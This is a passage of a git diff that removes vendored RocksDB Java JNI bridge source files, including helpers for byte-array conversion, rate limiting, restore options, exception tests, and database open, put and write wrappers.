-     *     if an OutOfMemoryError exception occurs
-     */
-    template <typename T> static T byteString(JNIEnv* env,
-        jbyteArray jbyte_string_ary,
-        std::function<T(const char*, const size_t)> string_fn,
-        jboolean* has_exception) {
-      const jsize jbyte_string_len = env->GetArrayLength(jbyte_string_ary);
-      jbyte* jbyte_string =
-          env->GetByteArrayElements(jbyte_string_ary, nullptr);
-      if(jbyte_string == nullptr) {
-        // exception thrown: OutOfMemoryError
-        *has_exception = JNI_TRUE;
-        return nullptr;  // signal error
-      }
-
-      T result =
-          string_fn(reinterpret_cast<char *>(jbyte_string), jbyte_string_len);
-
-      env->ReleaseByteArrayElements(jbyte_string_ary, jbyte_string, JNI_ABORT);
-
-      *has_exception = JNI_FALSE;
-      return result;
-    }
-
-    /**
-     * Converts a std::vector<string> to a Java byte[][] where each Java String
-     * is expressed as a Java Byte Array byte[].
-     *
-     * @param env A pointer to the java environment
-     * @param strings A vector of Strings
-     *
-     * @return A Java array of Strings expressed as bytes
-     */
-    static jobjectArray stringsBytes(JNIEnv* env, std::vector<std::string> strings) {
-      jclass jcls_ba = ByteJni::getArrayJClass(env);
-      if(jcls_ba == nullptr) {
-        // exception occurred
-        return nullptr;
-      }
-
-      const jsize len = static_cast<jsize>(strings.size());
-
-      jobjectArray jbyte_strings = env->NewObjectArray(len, jcls_ba, nullptr);
-      if(jbyte_strings == nullptr) {
-        // exception thrown: OutOfMemoryError
-        return nullptr;
-      }
-
-      for (jsize i = 0; i < len; i++) {
-        std::string *str = &strings[i];
-        const jsize str_len = static_cast<jsize>(str->size());
-
-        jbyteArray jbyte_string_ary = env->NewByteArray(str_len);
-        if(jbyte_string_ary == nullptr) {
-          // exception thrown: OutOfMemoryError
-          env->DeleteLocalRef(jbyte_strings);
-          return nullptr;
-        }
-
-        env->SetByteArrayRegion(
-          jbyte_string_ary, 0, str_len,
-          const_cast<jbyte*>(reinterpret_cast<const jbyte*>(str->c_str())));
-        if(env->ExceptionCheck()) {
-          // exception thrown: ArrayIndexOutOfBoundsException
-          env->DeleteLocalRef(jbyte_string_ary);
-          env->DeleteLocalRef(jbyte_strings);
-          return nullptr;
-        }
-
-        env->SetObjectArrayElement(jbyte_strings, i, jbyte_string_ary);
-        if(env->ExceptionCheck()) {
-          // exception thrown: ArrayIndexOutOfBoundsException
-          // or ArrayStoreException
-          env->DeleteLocalRef(jbyte_string_ary);
-          env->DeleteLocalRef(jbyte_strings);
-          return nullptr;
-        }
-
-        env->DeleteLocalRef(jbyte_string_ary);
-      }
-
-      return jbyte_strings;
-    }
-
-    /*
-     * Helper for operations on a key and value
-     * for example WriteBatch->Put
-     *
-     * TODO(AR) could be extended to cover returning rocksdb::Status
-     * from `op` and used for RocksDB->Put etc.
-     */
-    static void kv_op(
-        std::function<void(rocksdb::Slice, rocksdb::Slice)> op,
-        JNIEnv* env, jobject jobj,
-        jbyteArray jkey, jint jkey_len,
-        jbyteArray jentry_value, jint jentry_value_len) {
-      jbyte* key = env->GetByteArrayElements(jkey, nullptr);
-      if(env->ExceptionCheck()) {
-        // exception thrown: OutOfMemoryError
-        return;
-      }
-
-      jbyte* value = env->GetByteArrayElements(jentry_value, nullptr);
-      if(env->ExceptionCheck()) {
-        // exception thrown: OutOfMemoryError
-        if(key != nullptr) {
-          env->ReleaseByteArrayElements(jkey, key, JNI_ABORT);
-        }
-        return;
-      }
-
-      rocksdb::Slice key_slice(reinterpret_cast<char*>(key), jkey_len);
-      rocksdb::Slice value_slice(reinterpret_cast<char*>(value),
-          jentry_value_len);
-
-      op(key_slice, value_slice);
-
-      if(value != nullptr) {
-        env->ReleaseByteArrayElements(jentry_value, value, JNI_ABORT);
-      }
-      if(key != nullptr) {
-        env->ReleaseByteArrayElements(jkey, key, JNI_ABORT);
-      }
-    }
-
-    /*
-     * Helper for operations on a key
-     * for example WriteBatch->Delete
-     *
-     * TODO(AR) could be extended to cover returning rocksdb::Status
-     * from `op` and used for RocksDB->Delete etc.
-     */
-    static void k_op(
-        std::function<void(rocksdb::Slice)> op,
-        JNIEnv* env, jobject jobj,
-        jbyteArray jkey, jint jkey_len) {
-      jbyte* key = env->GetByteArrayElements(jkey, nullptr);
-      if(env->ExceptionCheck()) {
-        // exception thrown: OutOfMemoryError
-        return;
-      }
-
-      rocksdb::Slice key_slice(reinterpret_cast<char*>(key), jkey_len);
-
-      op(key_slice);
-
-      if(key != nullptr) {
-        env->ReleaseByteArrayElements(jkey, key, JNI_ABORT);
-      }
-    }
-
-    /*
-     * Helper for operations on a value
-     * for example WriteBatchWithIndex->GetFromBatch
-     */
-    static jbyteArray v_op(
-        std::function<rocksdb::Status(rocksdb::Slice, std::string*)> op,
-        JNIEnv* env, jbyteArray jkey, jint jkey_len) {
-      jbyte* key = env->GetByteArrayElements(jkey, nullptr);
-      if(env->ExceptionCheck()) {
-        // exception thrown: OutOfMemoryError
-        return nullptr;
-      }
-
-      rocksdb::Slice key_slice(reinterpret_cast<char*>(key), jkey_len);
-
-      std::string value;
-      rocksdb::Status s = op(key_slice, &value);
-
-      if(key != nullptr) {
-        env->ReleaseByteArrayElements(jkey, key, JNI_ABORT);
-      }
-
-      if (s.IsNotFound()) {
-        return nullptr;
-      }
-
-      if (s.ok()) {
-        jbyteArray jret_value =
-            env->NewByteArray(static_cast<jsize>(value.size()));
-        if(jret_value == nullptr) {
-          // exception thrown: OutOfMemoryError
-          return nullptr;
-        }
-
-        env->SetByteArrayRegion(jret_value, 0, static_cast<jsize>(value.size()),
-                                const_cast<jbyte*>(reinterpret_cast<const jbyte*>(value.c_str())));
-        if(env->ExceptionCheck()) {
-          // exception thrown: ArrayIndexOutOfBoundsException
-          if(jret_value != nullptr) {
-            env->DeleteLocalRef(jret_value);
-          }
-          return nullptr;
-        }
-
-        return jret_value;
-      }
-
-      rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-      return nullptr;
-    }
-};
-
-}  // namespace rocksdb
-#endif  // JAVA_ROCKSJNI_PORTAL_H_
diff --git a/thirdparty/rocksdb/java/rocksjni/ratelimiterjni.cc b/thirdparty/rocksdb/java/rocksjni/ratelimiterjni.cc
deleted file mode 100644
index b4174ff..0000000
--- a/thirdparty/rocksdb/java/rocksjni/ratelimiterjni.cc
+++ /dev/null
@@ -1,96 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for RateLimiter.
-
-#include "rocksjni/portal.h"
-#include "include/org_rocksdb_RateLimiter.h"
-#include "rocksdb/rate_limiter.h"
-
-/*
- * Class:     org_rocksdb_RateLimiter
- * Method:    newRateLimiterHandle
- * Signature: (JJI)J
- */
-jlong Java_org_rocksdb_RateLimiter_newRateLimiterHandle(
-    JNIEnv* env, jclass jclazz, jlong jrate_bytes_per_second,
-    jlong jrefill_period_micros, jint jfairness) {
-  auto * sptr_rate_limiter =
-      new std::shared_ptr<rocksdb::RateLimiter>(rocksdb::NewGenericRateLimiter(
-          static_cast<int64_t>(jrate_bytes_per_second),
-          static_cast<int64_t>(jrefill_period_micros),
-          static_cast<int32_t>(jfairness)));
-
-  return reinterpret_cast<jlong>(sptr_rate_limiter);
-}
-
-/*
- * Class:     org_rocksdb_RateLimiter
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_RateLimiter_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* handle =
-      reinterpret_cast<std::shared_ptr<rocksdb::RateLimiter> *>(jhandle);
-  delete handle;  // delete std::shared_ptr
-}
-
-/*
- * Class:     org_rocksdb_RateLimiter
- * Method:    setBytesPerSecond
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_RateLimiter_setBytesPerSecond(
-    JNIEnv* env, jobject jobj, jlong handle,
-    jlong jbytes_per_second) {
-  reinterpret_cast<std::shared_ptr<rocksdb::RateLimiter> *>(handle)->get()->
-      SetBytesPerSecond(jbytes_per_second);
-}
-
-/*
- * Class:     org_rocksdb_RateLimiter
- * Method:    request
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_RateLimiter_request(
-    JNIEnv* env, jobject jobj, jlong handle,
-    jlong jbytes) {
-  reinterpret_cast<std::shared_ptr<rocksdb::RateLimiter> *>(handle)->get()->
-      Request(jbytes, rocksdb::Env::IO_TOTAL);
-}
-
-/*
- * Class:     org_rocksdb_RateLimiter
- * Method:    getSingleBurstBytes
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_RateLimiter_getSingleBurstBytes(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  return reinterpret_cast<std::shared_ptr<rocksdb::RateLimiter> *>(handle)->
-      get()->GetSingleBurstBytes();
-}
-
-/*
- * Class:     org_rocksdb_RateLimiter
- * Method:    getTotalBytesThrough
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_RateLimiter_getTotalBytesThrough(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  return reinterpret_cast<std::shared_ptr<rocksdb::RateLimiter> *>(handle)->
-      get()->GetTotalBytesThrough();
-}
-
-/*
- * Class:     org_rocksdb_RateLimiter
- * Method:    getTotalRequests
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_RateLimiter_getTotalRequests(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  return reinterpret_cast<std::shared_ptr<rocksdb::RateLimiter> *>(handle)->
-      get()->GetTotalRequests();
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/remove_emptyvalue_compactionfilterjni.cc b/thirdparty/rocksdb/java/rocksjni/remove_emptyvalue_compactionfilterjni.cc
deleted file mode 100644
index 8c54a46..0000000
--- a/thirdparty/rocksdb/java/rocksjni/remove_emptyvalue_compactionfilterjni.cc
+++ /dev/null
@@ -1,24 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <jni.h>
-
-#include "include/org_rocksdb_RemoveEmptyValueCompactionFilter.h"
-#include "utilities/compaction_filters/remove_emptyvalue_compactionfilter.h"
-
-
-/*
- * Class:     org_rocksdb_RemoveEmptyValueCompactionFilter
- * Method:    createNewRemoveEmptyValueCompactionFilter0
- * Signature: ()J
- */
-jlong Java_org_rocksdb_RemoveEmptyValueCompactionFilter_createNewRemoveEmptyValueCompactionFilter0(
-    JNIEnv* env, jclass jcls) {
-  auto* compaction_filter =
-      new rocksdb::RemoveEmptyValueCompactionFilter();
-
-  // set the native handle to our native compaction filter
-  return reinterpret_cast<jlong>(compaction_filter);
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/restorejni.cc b/thirdparty/rocksdb/java/rocksjni/restorejni.cc
deleted file mode 100644
index eb8e65b..0000000
--- a/thirdparty/rocksdb/java/rocksjni/restorejni.cc
+++ /dev/null
@@ -1,39 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling C++ rocksdb::RestoreOptions methods
-// from Java side.
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-#include <string>
-
-#include "include/org_rocksdb_RestoreOptions.h"
-#include "rocksjni/portal.h"
-#include "rocksdb/utilities/backupable_db.h"
-/*
- * Class:     org_rocksdb_RestoreOptions
- * Method:    newRestoreOptions
- * Signature: (Z)J
- */
-jlong Java_org_rocksdb_RestoreOptions_newRestoreOptions(JNIEnv* env,
-    jclass jcls, jboolean keep_log_files) {
-  auto* ropt = new rocksdb::RestoreOptions(keep_log_files);
-  return reinterpret_cast<jlong>(ropt);
-}
-
-/*
- * Class:     org_rocksdb_RestoreOptions
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_RestoreOptions_disposeInternal(JNIEnv* env, jobject jobj,
-    jlong jhandle) {
-  auto* ropt = reinterpret_cast<rocksdb::RestoreOptions*>(jhandle);
-  assert(ropt);
-  delete ropt;
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/rocksdb_exception_test.cc b/thirdparty/rocksdb/java/rocksjni/rocksdb_exception_test.cc
deleted file mode 100644
index 339d4c5..0000000
--- a/thirdparty/rocksdb/java/rocksjni/rocksdb_exception_test.cc
+++ /dev/null
@@ -1,78 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <jni.h>
-
-#include "include/org_rocksdb_RocksDBExceptionTest.h"
-
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-#include "rocksjni/portal.h"
-
-/*
- * Class:     org_rocksdb_RocksDBExceptionTest
- * Method:    raiseException
- * Signature: ()V
- */
-void Java_org_rocksdb_RocksDBExceptionTest_raiseException(JNIEnv* env,
-                                                          jobject jobj) {
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, std::string("test message"));
-}
-
-/*
- * Class:     org_rocksdb_RocksDBExceptionTest
- * Method:    raiseExceptionWithStatusCode
- * Signature: ()V
- */
-void Java_org_rocksdb_RocksDBExceptionTest_raiseExceptionWithStatusCode(
-    JNIEnv* env, jobject jobj) {
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, "test message",
-                                         rocksdb::Status::NotSupported());
-}
-
-/*
- * Class:     org_rocksdb_RocksDBExceptionTest
- * Method:    raiseExceptionNoMsgWithStatusCode
- * Signature: ()V
- */
-void Java_org_rocksdb_RocksDBExceptionTest_raiseExceptionNoMsgWithStatusCode(
-    JNIEnv* env, jobject jobj) {
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, rocksdb::Status::NotSupported());
-}
-
-/*
- * Class:     org_rocksdb_RocksDBExceptionTest
- * Method:    raiseExceptionWithStatusCodeSubCode
- * Signature: ()V
- */
-void Java_org_rocksdb_RocksDBExceptionTest_raiseExceptionWithStatusCodeSubCode(
-    JNIEnv* env, jobject jobj) {
-  rocksdb::RocksDBExceptionJni::ThrowNew(
-      env, "test message",
-      rocksdb::Status::TimedOut(rocksdb::Status::SubCode::kLockTimeout));
-}
-
-/*
- * Class:     org_rocksdb_RocksDBExceptionTest
- * Method:    raiseExceptionNoMsgWithStatusCodeSubCode
- * Signature: ()V
- */
-void Java_org_rocksdb_RocksDBExceptionTest_raiseExceptionNoMsgWithStatusCodeSubCode(
-    JNIEnv* env, jobject jobj) {
-  rocksdb::RocksDBExceptionJni::ThrowNew(
-      env, rocksdb::Status::TimedOut(rocksdb::Status::SubCode::kLockTimeout));
-}
-
-/*
- * Class:     org_rocksdb_RocksDBExceptionTest
- * Method:    raiseExceptionWithStatusCodeState
- * Signature: ()V
- */
-void Java_org_rocksdb_RocksDBExceptionTest_raiseExceptionWithStatusCodeState(
-    JNIEnv* env, jobject jobj) {
-  rocksdb::Slice state("test state");
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, "test message",
-                                         rocksdb::Status::NotSupported(state));
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/rocksjni.cc b/thirdparty/rocksdb/java/rocksjni/rocksjni.cc
deleted file mode 100644
index a08a459..0000000
--- a/thirdparty/rocksdb/java/rocksjni/rocksjni.cc
+++ /dev/null
@@ -1,2198 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling c++ rocksdb::DB methods from Java side.
-
-#include <jni.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <algorithm>
-#include <functional>
-#include <memory>
-#include <string>
-#include <tuple>
-#include <vector>
-
-#include "include/org_rocksdb_RocksDB.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/types.h"
-#include "rocksjni/portal.h"
-
-#ifdef min
-#undef min
-#endif
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::Open
-jlong rocksdb_open_helper(JNIEnv* env, jlong jopt_handle, jstring jdb_path,
-    std::function<rocksdb::Status(
-      const rocksdb::Options&, const std::string&, rocksdb::DB**)> open_fn
-    ) {
-  const char* db_path = env->GetStringUTFChars(jdb_path, nullptr);
-  if(db_path == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return 0;
-  }
-
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jopt_handle);
-  rocksdb::DB* db = nullptr;
-  rocksdb::Status s = open_fn(*opt, db_path, &db);
-
-  env->ReleaseStringUTFChars(jdb_path, db_path);
-
-  if (s.ok()) {
-    return reinterpret_cast<jlong>(db);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-    return 0;
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    open
- * Signature: (JLjava/lang/String;)J
- */
-jlong Java_org_rocksdb_RocksDB_open__JLjava_lang_String_2(
-    JNIEnv* env, jclass jcls, jlong jopt_handle, jstring jdb_path) {
-  return rocksdb_open_helper(env, jopt_handle, jdb_path,
-    (rocksdb::Status(*)
-      (const rocksdb::Options&, const std::string&, rocksdb::DB**)
-    )&rocksdb::DB::Open
-  );
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    openROnly
- * Signature: (JLjava/lang/String;)J
- */
-jlong Java_org_rocksdb_RocksDB_openROnly__JLjava_lang_String_2(
-    JNIEnv* env, jclass jcls, jlong jopt_handle, jstring jdb_path) {
-  return rocksdb_open_helper(env, jopt_handle, jdb_path, [](
-      const rocksdb::Options& options,
-      const std::string& db_path, rocksdb::DB** db) {
-    return rocksdb::DB::OpenForReadOnly(options, db_path, db);
-  });
-}
-
-jlongArray rocksdb_open_helper(JNIEnv* env, jlong jopt_handle,
-    jstring jdb_path, jobjectArray jcolumn_names, jlongArray jcolumn_options,
-    std::function<rocksdb::Status(
-      const rocksdb::DBOptions&, const std::string&,
-      const std::vector<rocksdb::ColumnFamilyDescriptor>&,
-      std::vector<rocksdb::ColumnFamilyHandle*>*,
-      rocksdb::DB**)> open_fn
-    ) {
-  const char* db_path = env->GetStringUTFChars(jdb_path, nullptr);
-  if(db_path == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-
-  const jsize len_cols = env->GetArrayLength(jcolumn_names);
-  jlong* jco = env->GetLongArrayElements(jcolumn_options, nullptr);
-  if(jco == nullptr) {
-    // exception thrown: OutOfMemoryError
-    env->ReleaseStringUTFChars(jdb_path, db_path);
-    return nullptr;
-  }
-
-  std::vector<rocksdb::ColumnFamilyDescriptor> column_families;
-  jboolean has_exception = JNI_FALSE;
-  rocksdb::JniUtil::byteStrings<std::string>(
-    env,
-    jcolumn_names,
-    [](const char* str_data, const size_t str_len) {
-      return std::string(str_data, str_len);
-    },
-    [&jco, &column_families](size_t idx, std::string cf_name) {
-      rocksdb::ColumnFamilyOptions* cf_options =
-          reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jco[idx]);
-      column_families.push_back(
-          rocksdb::ColumnFamilyDescriptor(cf_name, *cf_options));
-    },
-    &has_exception);
-
-  env->ReleaseLongArrayElements(jcolumn_options, jco, JNI_ABORT);
-
-  if(has_exception == JNI_TRUE) {
-    // exception occurred
-    env->ReleaseStringUTFChars(jdb_path, db_path);
-    return nullptr;
-  }
-
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jopt_handle);
-  std::vector<rocksdb::ColumnFamilyHandle*> handles;
-  rocksdb::DB* db = nullptr;
-  rocksdb::Status s = open_fn(*opt, db_path, column_families,
-      &handles, &db);
-
-  // we have now finished with db_path
-  env->ReleaseStringUTFChars(jdb_path, db_path);
-
-  // check if open operation was successful
-  if (s.ok()) {
-    const jsize resultsLen = 1 + len_cols; //db handle + column family handles
-    std::unique_ptr<jlong[]> results =
-        std::unique_ptr<jlong[]>(new jlong[resultsLen]);
-    results[0] = reinterpret_cast<jlong>(db);
-    for(int i = 1; i <= len_cols; i++) {
-      results[i] = reinterpret_cast<jlong>(handles[i - 1]);
-    }
-
-    jlongArray jresults = env->NewLongArray(resultsLen);
-    if(jresults == nullptr) {
-      // exception thrown: OutOfMemoryError
-      return nullptr;
-    }
-
-    env->SetLongArrayRegion(jresults, 0, resultsLen, results.get());
-    if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      env->DeleteLocalRef(jresults);
-      return nullptr;
-    }
-
-    return jresults;
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-    return nullptr;
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    openROnly
- * Signature: (JLjava/lang/String;[[B[J)[J
- */
-jlongArray Java_org_rocksdb_RocksDB_openROnly__JLjava_lang_String_2_3_3B_3J(
-    JNIEnv* env, jclass jcls, jlong jopt_handle, jstring jdb_path,
-    jobjectArray jcolumn_names, jlongArray jcolumn_options) {
-  return rocksdb_open_helper(env, jopt_handle, jdb_path, jcolumn_names,
-    jcolumn_options, [](
-        const rocksdb::DBOptions& options, const std::string& db_path,
-        const std::vector<rocksdb::ColumnFamilyDescriptor>& column_families,
-        std::vector<rocksdb::ColumnFamilyHandle*>* handles, rocksdb::DB** db) {
-      return rocksdb::DB::OpenForReadOnly(options, db_path, column_families,
-        handles, db);
-  });
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    open
- * Signature: (JLjava/lang/String;[[B[J)[J
- */
-jlongArray Java_org_rocksdb_RocksDB_open__JLjava_lang_String_2_3_3B_3J(
-    JNIEnv* env, jclass jcls, jlong jopt_handle, jstring jdb_path,
-    jobjectArray jcolumn_names, jlongArray jcolumn_options) {
-  return rocksdb_open_helper(env, jopt_handle, jdb_path, jcolumn_names,
-    jcolumn_options, (rocksdb::Status(*)
-      (const rocksdb::DBOptions&, const std::string&,
-        const std::vector<rocksdb::ColumnFamilyDescriptor>&,
-        std::vector<rocksdb::ColumnFamilyHandle*>*, rocksdb::DB**)
-      )&rocksdb::DB::Open
-    );
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::ListColumnFamilies
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    listColumnFamilies
- * Signature: (JLjava/lang/String;)[[B
- */
-jobjectArray Java_org_rocksdb_RocksDB_listColumnFamilies(
-    JNIEnv* env, jclass jclazz, jlong jopt_handle, jstring jdb_path) {
-  std::vector<std::string> column_family_names;
-  const char* db_path = env->GetStringUTFChars(jdb_path, nullptr);
-  if(db_path == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jopt_handle);
-  rocksdb::Status s = rocksdb::DB::ListColumnFamilies(*opt, db_path,
-      &column_family_names);
-
-  env->ReleaseStringUTFChars(jdb_path, db_path);
-
-  jobjectArray jcolumn_family_names =
-      rocksdb::JniUtil::stringsBytes(env, column_family_names);
-
-  return jcolumn_family_names;
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::Put
-
-/**
- * @return true if the put succeeded, false if a Java Exception was thrown
- */
-bool rocksdb_put_helper(JNIEnv* env, rocksdb::DB* db,
-                        const rocksdb::WriteOptions& write_options,
-                        rocksdb::ColumnFamilyHandle* cf_handle, jbyteArray jkey,
-                        jint jkey_off, jint jkey_len, jbyteArray jval,
-                        jint jval_off, jint jval_len) {
-  jbyte* key = new jbyte[jkey_len];
-  env->GetByteArrayRegion(jkey, jkey_off, jkey_len, key);
-  if(env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    delete [] key;
-    return false;
-  }
-
-  jbyte* value = new jbyte[jval_len];
-  env->GetByteArrayRegion(jval, jval_off, jval_len, value);
-  if(env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    delete [] value;
-    delete [] key;
-    return false;
-  }
-
-  rocksdb::Slice key_slice(reinterpret_cast<char*>(key), jkey_len);
-  rocksdb::Slice value_slice(reinterpret_cast<char*>(value), jval_len);
-
-  rocksdb::Status s;
-  if (cf_handle != nullptr) {
-    s = db->Put(write_options, cf_handle, key_slice, value_slice);
-  } else {
-    // backwards compatibility
-    s = db->Put(write_options, key_slice, value_slice);
-  }
-
-  // cleanup
-  delete [] value;
-  delete [] key;
-
-  if (s.ok()) {
-    return true;
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-    return false;
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    put
- * Signature: (J[BII[BII)V
- */
-void Java_org_rocksdb_RocksDB_put__J_3BII_3BII(JNIEnv* env, jobject jdb,
-                                               jlong jdb_handle,
-                                               jbyteArray jkey, jint jkey_off,
-                                               jint jkey_len, jbyteArray jval,
-                                               jint jval_off, jint jval_len) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  static const rocksdb::WriteOptions default_write_options =
-      rocksdb::WriteOptions();
-
-  rocksdb_put_helper(env, db, default_write_options, nullptr, jkey, jkey_off,
-                     jkey_len, jval, jval_off, jval_len);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    put
- * Signature: (J[BII[BIIJ)V
- */
-void Java_org_rocksdb_RocksDB_put__J_3BII_3BIIJ(JNIEnv* env, jobject jdb,
-                                                jlong jdb_handle,
-                                                jbyteArray jkey, jint jkey_off,
-                                                jint jkey_len, jbyteArray jval,
-                                                jint jval_off, jint jval_len,
-                                                jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  static const rocksdb::WriteOptions default_write_options =
-      rocksdb::WriteOptions();
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    rocksdb_put_helper(env, db, default_write_options, cf_handle, jkey,
-                       jkey_off, jkey_len, jval, jval_off, jval_len);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    put
- * Signature: (JJ[BII[BII)V
- */
-void Java_org_rocksdb_RocksDB_put__JJ_3BII_3BII(JNIEnv* env, jobject jdb,
-                                                jlong jdb_handle,
-                                                jlong jwrite_options_handle,
-                                                jbyteArray jkey, jint jkey_off,
-                                                jint jkey_len, jbyteArray jval,
-                                                jint jval_off, jint jval_len) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* write_options = reinterpret_cast<rocksdb::WriteOptions*>(
-      jwrite_options_handle);
-
-  rocksdb_put_helper(env, db, *write_options, nullptr, jkey, jkey_off, jkey_len,
-                     jval, jval_off, jval_len);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    put
- * Signature: (JJ[BII[BIIJ)V
- */
-void Java_org_rocksdb_RocksDB_put__JJ_3BII_3BIIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jwrite_options_handle,
-    jbyteArray jkey, jint jkey_off, jint jkey_len, jbyteArray jval,
-    jint jval_off, jint jval_len, jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* write_options = reinterpret_cast<rocksdb::WriteOptions*>(
-      jwrite_options_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    rocksdb_put_helper(env, db, *write_options, cf_handle, jkey, jkey_off,
-                       jkey_len, jval, jval_off, jval_len);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-  }
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::Write
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    write0
- * Signature: (JJJ)V
- */
-void Java_org_rocksdb_RocksDB_write0(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jlong jwrite_options_handle, jlong jwb_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* write_options = reinterpret_cast<rocksdb::WriteOptions*>(
-      jwrite_options_handle);
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-
-  rocksdb::Status s = db->Write(*write_options, wb);
-
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    write1
- * Signature: (JJJ)V
- */
-void Java_org_rocksdb_RocksDB_write1(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jlong jwrite_options_handle, jlong jwbwi_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* write_options = reinterpret_cast<rocksdb::WriteOptions*>(
-      jwrite_options_handle);
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  auto* wb = wbwi->GetWriteBatch();
-
-  rocksdb::Status s = db->Write(*write_options, wb);
-
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::KeyMayExist
-jboolean key_may_exist_helper(JNIEnv* env, rocksdb::DB* db,
-    const rocksdb::ReadOptions& read_opt,
